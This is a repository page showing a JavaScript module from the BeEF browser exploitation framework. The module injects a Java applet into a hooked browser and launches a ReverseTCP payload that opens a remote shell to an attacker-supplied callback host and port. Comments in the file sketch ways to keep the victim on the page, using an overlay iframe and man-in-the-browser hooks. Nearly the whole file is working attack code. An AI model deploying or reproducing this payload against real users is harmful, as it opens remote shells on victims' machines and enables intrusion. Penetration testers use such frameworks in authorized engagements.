Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
b6425e4a908e5ce8a2eb042f59856010e725ee87
beef/modules/exploits/local_host/java_payload/command.js

46 lines
2.0 KiB
JavaScript
Executable File
Raw Blame History

//
// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var conn = '<%= @conn %>';
var cbHost = '<%= @cbHost %>';
var cbPort = '<%= @cbPort %>';
var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
null, applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
//TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
//TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.
//TODO: =========== persistence techniques ===========
// the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to
// download platform dependent executable (i.e. meterpreter) and then kill the applet.
// we have 2 options:
// 1. use the MITB code (currently doesn't work on IE)
// 2. create an overlay iFrame while having the applet runnin in the background
//
// 1. setTimeout(beef.dom.createIframe('fullscreen', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
// 2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
// var MITBload = setInterval(function(){
// if(beef.pageIsLoaded){
// clearInterval(MITBload);
// beef.mitb.hook();
// }
// }, 100);
beef.debug('[Java Payload] Applet with id[' + applet_id + '] added to the DOM.');
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');
});
Reference in New Issue View Git Blame Copy Permalink